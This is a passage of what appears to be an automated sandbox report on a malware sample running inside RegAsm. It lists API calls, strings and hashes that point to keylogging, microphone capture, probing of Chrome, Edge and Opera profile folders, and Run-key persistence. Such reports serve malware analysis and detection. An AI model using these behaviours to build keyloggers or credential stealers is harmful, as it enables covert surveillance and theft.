                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                APIs
                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: | $%02i:%02i:%02i:%03i
                                                • API String ID: 481472006-2430845779
                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: alarm.wav$hYG
                                                • API String ID: 1174141254-2782910960
                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                APIs
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                • String ID: Online Keylogger Stopped
                                                • API String ID: 1623830855-1496645233
                                                • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                APIs
                                                • waveInPrepareHeader.WINMM(007F9030,00000020,?), ref: 00401849
                                                • waveInAddBuffer.WINMM(007F9030,00000020), ref: 0040185F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferHeaderPrepare
                                                • String ID: XMG
                                                • API String ID: 2315374483-813777761
                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                APIs
                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocaleValid
                                                • String ID: IsValidLocaleName$kKD
                                                • API String ID: 1901932003-3269126172
                                                • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                • API String ID: 1174141254-4188645398
                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                • API String ID: 1174141254-2800177040
                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                • API String ID: 1174141254-1629609700
                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                APIs
                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                • String ID: [AltL]$[AltR]
                                                • API String ID: 2738857842-2658077756
                                                • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: !D@$open
                                                • API String ID: 587946157-1586967515
                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                APIs
                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State
                                                • String ID: [CtrlL]$[CtrlR]
                                                • API String ID: 1649606143-2446555240
                                                • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                APIs
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer__onexit
                                                • String ID: ,kG$0kG
                                                • API String ID: 1881088180-2015055088
                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                APIs
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 2654517830-1051519024
                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteDirectoryFileRemove
                                                • String ID: pth_unenc
                                                • API String ID: 3325800564-4028850238
                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                APIs
                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ObjectProcessSingleTerminateWait
                                                • String ID: pth_unenc
                                                • API String ID: 1872346434-4028850238
                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                APIs
                                                • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                                • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountInfoInputLastTick
                                                • String ID: NG
                                                • API String ID: 3478931382-1651712548
                                                • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                • GetLastError.KERNEL32 ref: 00440D85
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                APIs
                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastRead
                                                • String ID:
                                                • API String ID: 4100373531-0
                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                Execution Graph

                                                Execution Coverage:5.4%
                                                Dynamic/Decrypted Code Coverage:9.2%
                                                Signature Coverage:0%
                                                Total number of Nodes:1990
                                                Total number of Limit Nodes:56
38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 
SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b 
